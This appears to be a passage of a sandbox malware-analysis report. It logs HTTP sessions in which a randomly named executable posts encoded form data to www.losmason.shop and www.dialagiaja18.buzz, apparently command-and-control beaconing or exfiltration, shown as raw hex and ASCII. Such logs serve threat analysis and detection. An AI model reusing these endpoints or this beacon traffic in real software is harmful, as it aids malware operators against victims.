                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 75 50 47 30 48 47 32 56 76 2b 44 65 62 50 6c 79 44 62 58 39 52 66 43 70 73 46 4d 6d 77 32 74 34 79 6e 46 6c 44 7a 51 55 4f 70 42 73 45 68 50 6d 6b 42 56 4e 64 4a 66 67 43 4c 68 65 69 53 7a 6c 43 33 47 6b 4d 4d 70 4b 78 67 51 50 71 4d 75 6f 50 50 77 4b 76 31 68 46 2b 50 5a 41 4f 44 4f 66 51 72 57 62 76 5a 36 4c 48 52 56 44 41 53 78 71 47 52 4e 73 46 36 4d 42 67 55 45 72 7a 50 70 37 50 38 64 47 46 56 49 43 52 58 63 7a 72 36 43 64 62 65 49 55 6b 4f 41 73 36 33 76 73 65 5a 4c 34 58 63 75 6c 42 37 4a 72 71 62 47 46 50 4d 30 54 73 63 47 6f 7a 41 77 2b 6d 34 75 35 45 35 55 79 74 58 51 77 74 34 6a 46 4e 72 66 33 6d 46 50 53 59 77 3d 3d
                                                              Data Ascii: jp30l4Dh=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XculB7JrqbGFPM0TscGozAw+m4u5E5UytXQwt4jFNrf3mFPSYw==
                                                              Nov 24, 2024 08:35:06.513047934 CET565INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=VoYyR8n5jsIP86zdibklXeYgFYxNwLRNuIBy8bgwuBo-1732433706-1.0.1.1-tpq5OQM6GckqDndZWDq36lEykalk_5HCIn35Z1fziGJgBSbiV6BgyvDakC3cFCiQirBzQHZJPAYNAhdptIGADg; path=/; expires=Sun, 24-Nov-24 08:05:06 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b8680ad572ad-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749855104.18.73.11680520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:07.952327967 CET745OUTPOST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 75 50 47 30 48 47 32 56 76 2b 44 65 5a 76 31 79 45 38 6a 39 64 76 43 71 67 6c 4d 6d 72 6d 74 38 79 6e 5a 6c 44 32 67 45 4a 62 31 73 45 45 7a 6d 6e 41 56 4e 51 70 66 67 61 37 68 48 2f 69 79 6e 43 33 4b 47 4d 49 68 4b 78 67 45 50 71 4d 65 6f 4d 35 34 4e 76 6c 68 48 34 50 5a 43 42 6a 4f 66 51 72 57 62 76 64 61 68 48 52 4e 44 41 44 42 71 48 7a 6c 76 62 4b 4d 43 6e 55 45 72 35 76 70 6e 50 38 64 42 46 58 38 37 52 56 30 7a 72 37 53 64 62 50 49 56 39 65 41 75 33 58 75 48 50 35 69 43 57 63 4b 6c 49 5a 35 56 7a 74 6d 2f 48 61 31 78 32 2b 4b 45 74 52 49 46 69 36 4b 50 54 66 4a 48 76 57 55 6f 67 61 58 6b 53 63 36 64 72 58 75 57 4f 4e 59 4d 55 75 72 61 44 49 6e 49 79 44 56 4b 78 52 42 39 47 41 45 3d
                                                              Data Ascii: jp30l4Dh=uPG0HG2Vv+DeZv1yE8j9dvCqglMmrmt8ynZlD2gEJb1sEEzmnAVNQpfga7hH/iynC3KGMIhKxgEPqMeoM54NvlhH4PZCBjOfQrWbvdahHRNDADBqHzlvbKMCnUEr5vpnP8dBFX87RV0zr7SdbPIV9eAu3XuHP5iCWcKlIZ5Vztm/Ha1x2+KEtRIFi6KPTfJHvWUogaXkSc6drXuWONYMUuraDInIyDVKxRB9GAE=
                                                              Nov 24, 2024 08:35:09.187107086 CET565INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=pFQwRma3zlWxzyIhwPlA_fV8wvzI4aTqUoGrPAskl.U-1732433709-1.0.1.1-_2ULUrF_p81Jf8EMi15aRpVNFj.l6jFI_ObV88.zQdPRlEt38cVE.MEX6hBk02GnQBf6IWXfw716za7_B25WaA; path=/; expires=Sun, 24-Nov-24 08:05:09 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b878cbe60f42-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749862104.18.73.11680520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:10.617640018 CET1758OUTPOST /uktz/ HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.losmason.shop
                                                              Referer: http://www.losmason.shop/uktz/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 75 50 47 30 48 47 32 56 76 2b 44 65 5a 76 31 79 45 38 6a 39 64 76 43 71 67 6c 4d 6d 72 6d 74 38 79 6e 5a 6c 44 32 67 45 4a 62 74 73 45 53 6e 6d 6b 6a 39 4e 52 70 66 67 45 4c 68 43 2f 69 7a 2f 43 33 69 43 4d 49 73 39 78 6d 49 50 71 74 2b 6f 4e 4c 51 4e 6b 6c 68 48 30 76 5a 48 4f 44 4f 47 51 72 47 68 76 5a 2b 68 48 52 4e 44 41 41 70 71 4f 42 4e 76 5a 4b 4d 42 67 55 45 4f 7a 50 70 62 50 38 46 33 46 58 6f 30 4e 31 55 7a 71 61 69 64 5a 39 51 56 31 65 41 6f 6b 6e 75 66 50 35 2b 6e 57 63 58 65 49 63 74 2f 7a 72 57 2f 58 37 73 4b 70 61 48 53 2b 79 49 34 68 35 6d 4d 57 63 74 64 32 6c 41 49 6d 61 47 46 5a 4f 69 2b 7a 30 33 5a 4e 49 35 4c 47 2f 54 51 41 72 58 72 7a 6d 34 53 74 55 56 57 62 55 67 36 36 73 44 64 52 2f 44 64 4a 79 62 64 48 4d 4f 42 53 69 67 6d 39 70 6b 6f 7a 74 76 62 58 63 50 66 73 5a 4b 2f 6a 71 41 55 53 44 4f 75 6c 58 71 31 65 4c 41 6a 46 50 7a 36 73 6c 36 37 70 2f 63 35 6f 35 65 6d 46 71 6f 35 35 64 59 6c 4b 46 70 6b 65 4b 6f 57 2f 57 6f 35 68 63 6e 76 52 59 6c 62 64 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=uPG0HG2Vv+DeZv1yE8j9dvCqglMmrmt8ynZlD2gEJbtsESnmkj9NRpfgELhC/iz/C3iCMIs9xmIPqt+oNLQNklhH0vZHODOGQrGhvZ+hHRNDAApqOBNvZKMBgUEOzPpbP8F3FXo0N1UzqaidZ9QV1eAoknufP5+nWcXeIct/zrW/X7sKpaHS+yI4h5mMWctd2lAImaGFZOi+z03ZNI5LG/TQArXrzm4StUVWbUg66sDdR/DdJybdHMOBSigm9pkoztvbXcPfsZK/jqAUSDOulXq1eLAjFPz6sl67p/c5o5emFqo55dYlKFpkeKoW/Wo5hcnvRYlbd3kLCUtATiKS59GxeoO4CVu0QqzBmEDFEbiTTyFmNLsymNNuD0s/84tJLyyOeq3BfG3UWsaGTpNk0m0JtVqsIU6YJ2vjr7CpfDLq+WIMMgCzNS4ih3Xx1R7sNz7H4v6IoDG7kHtqpeGGYJARWI0HZLXjAy1al5hz0L3naQD8bk/Wt6R0SepdR1vD+F5Fozo98NVthKPFi5ebzTQo7ew0wZauugf9Wb1DQM6QpF2D8bCyX0HE2yq9ggLKJR6TWKlr00MwRePIOqIxbdupoqSawJUuLdqhnvcuXJqeKb4hWE/FS88jwhTy2TIxIFDcnypMU1mh3o/SSVusA574m0uiFfxaY2In/cme19TQ7EXRkMz+N7L/Ljq8XQXp8YZfiwI1J13W7SYS89X9st1JEHV+uDYUH7+vSqQB1aWv4u6J/NoU4Ng0lSsc3VFYj/+Wg/yBT5EAoCGNdmuYAEMv7sIsExGYMyZIne9oezbVLp3MSxdncsCLRknk7qW/0R/pYCSLLhCQohfuciwGnOBsNx8cj6W59aUBt8FNifVAPHJR19BeGxSlooEaRWAAwkdRH2n8oPNEjPqNPCpVVcaqE6/LeYQNhXVhntc0Rxmmmf00xK+IHVanBfDLqh1KgrYCGC3hV2LhI6LbgucRV+91C/1B9TBw+2ODZHimVVT [TRUNCATED]
                                                              Nov 24, 2024 08:35:11.828428984 CET565INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:11 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=JyYbtAAdEs1ovo197JvEUuFBaW9hQZrnrRfAgrKI7ks-1732433711-1.0.1.1-v2B.sNqcuIjiupM9dr4.x8oroRXVoHE1gVeTf7d8oPOy_81a4JgNLRuepI5Zw3jDu3y5lRHWi4FUFHygjAwpRw; path=/; expires=Sun, 24-Nov-24 08:05:11 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b8894bd5c34e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.749868104.18.73.11680520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:13.676418066 CET460OUTGET /uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.losmason.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:35:14.772567987 CET729INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 24 Nov 2024 07:35:14 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Location: https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj
                                                              CF-Cache-Status: DYNAMIC
                                                              Set-Cookie: __cf_bm=V4V9iiTXtxoVA6SblxTUjakyibblXFVqHmDBC0Ap7Oc-1732433714-1.0.1.1-XAOSysrsred0AHWIpl6ZJgkadRHAANp_1AZhOqP03vq2Bkj26XDgZ1eY3ewpBuH3l3suOS.Af7bsgGN7krqoZg; path=/; expires=Sun, 24-Nov-24 08:05:14 GMT; domain=.www.losmason.shop; HttpOnly
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b89bc96672b6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.74988466.29.148.7880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:20.736753941 CET737OUTPOST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 31 4f 4f 56 66 45 30 72 42 44 4a 37 56 4a 41 42 63 64 62 4a 62 36 36 49 6f 35 50 57 70 49 76 57 48 6b 45 79 7a 62 7a 69 78 34 75 36 48 6b 65 4e 34 79 76 61 4b 74 4e 41 78 36 76 74 4a 44 4c 46 2b 71 31 7a 75 54 71 79 73 2f 30 62 6d 78 56 6a 5a 58 53 34 43 43 49 4d 63 47 59 50 54 61 79 68 52 65 4f 44 44 41 36 76 78 37 4e 6b 30 64 41 48 76 68 73 59 73 4c 37 73 6a 65 70 75 4c 2f 67 62 75 6a 57 33 35 6d 66 46 69 70 6a 77 33 70 69 64 4b 66 50 64 31 54 41 65 49 55 5a 57 41 76 71 54 64 54 75 72 34 73 79 69 45 65 66 50 54 69 51 2f 69 7a 65 6f 49 2b 45 32 52 6b 49 6f 38 30 58 65 76 54 78 4f 58 67 3d 3d
                                                              Data Ascii: jp30l4Dh=mQlJ43QWk2uw1OOVfE0rBDJ7VJABcdbJb66Io5PWpIvWHkEyzbzix4u6HkeN4yvaKtNAx6vtJDLF+q1zuTqys/0bmxVjZXS4CCIMcGYPTayhReODDA6vx7Nk0dAHvhsYsL7sjepuL/gbujW35mfFipjw3pidKfPd1TAeIUZWAvqTdTur4syiEefPTiQ/izeoI+E2RkIo80XevTxOXg==
                                                              Nov 24, 2024 08:35:22.037144899 CET1236INHTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:21 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:22.037187099 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.74989266.29.148.7880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:23.396985054 CET757OUTPOST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 37 57 48 47 63 79 79 5a 62 69 77 34 75 36 4d 45 65 49 38 79 75 57 4b 74 42 79 78 2f 58 74 4a 41 33 46 2b 6f 64 7a 75 67 53 7a 2b 2f 30 64 75 52 56 68 47 6e 53 34 43 43 49 4d 63 47 4d 6c 54 61 71 68 51 75 65 44 43 6c 4f 75 38 62 4e 6a 7a 64 41 48 34 78 73 63 73 4c 36 35 6a 66 30 4c 4c 37 51 62 75 69 6d 33 36 31 48 47 6f 70 6a 4d 7a 70 6a 2f 43 39 6e 52 39 6d 6f 4e 4b 58 68 49 43 74 65 72 63 6c 76 4a 69 4f 2b 4f 61 50 6e 30 58 67 30 4a 31 56 44 64 4b 2f 41 75 63 47 38 4a 6a 44 79 30 69 42 51 4b 42 62 55 6f 74 58 54 41 34 47 55 54 62 66 37 32 4b 49 59 73 45 2b 6b 3d
                                                              Data Ascii: jp30l4Dh=mQlJ43QWk2uw3qKVZjorDjJ6ZpABV9bVb6mIo4b8q67WHGcyyZbiw4u6MEeI8yuWKtByx/XtJA3F+odzugSz+/0duRVhGnS4CCIMcGMlTaqhQueDClOu8bNjzdAH4xscsL65jf0LL7Qbuim361HGopjMzpj/C9nR9moNKXhICterclvJiO+OaPn0Xg0J1VDdK/AucG8JjDy0iBQKBbUotXTA4GUTbf72KIYsE+k=
                                                              Nov 24, 2024 08:35:24.603938103 CET1236INHTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:24 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:24.603969097 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.74990066.29.148.7880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:26.053543091 CET1770OUTPOST /o7bo/ HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.dialagiaja18.buzz
                                                              Referer: http://www.dialagiaja18.buzz/o7bo/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 6a 57 47 31 55 79 39 59 62 69 69 6f 75 36 42 6b 65 4a 38 79 76 4d 4b 74 5a 32 78 2b 72 39 4a 47 37 46 2f 4c 6c 7a 6f 52 53 7a 6b 76 30 64 69 78 56 67 5a 58 53 49 43 43 59 49 63 47 63 6c 54 61 71 68 51 73 57 44 55 41 36 75 2b 62 4e 6b 30 64 41 62 76 68 73 6b 73 4c 69 70 6a 66 78 2b 4c 49 59 62 75 43 32 33 31 6e 66 47 71 4a 6a 4b 30 70 6a 5a 43 39 36 50 39 67 4d 2f 4b 57 46 32 43 74 6d 72 64 54 65 30 6e 73 71 57 4a 4a 72 43 63 32 6f 4a 33 56 54 70 53 4d 70 58 57 45 6f 34 69 52 75 43 6b 48 77 44 44 74 64 6f 77 58 62 4d 34 6e 67 59 64 72 75 6e 62 62 45 58 47 4a 54 37 6d 37 51 54 75 31 68 42 46 48 62 6f 62 4a 6d 2b 33 44 41 54 52 50 6b 6f 6b 4f 7a 36 69 55 61 2f 34 53 38 39 58 77 47 43 6b 71 77 56 4d 38 31 44 68 4a 51 55 51 56 67 63 37 34 4a 37 41 6e 4f 38 50 33 63 4f 50 48 32 6b 43 65 34 32 74 58 48 6c 30 30 6a 4b 33 41 42 38 30 70 62 48 53 74 4d 4b 47 [TRUNCATED]
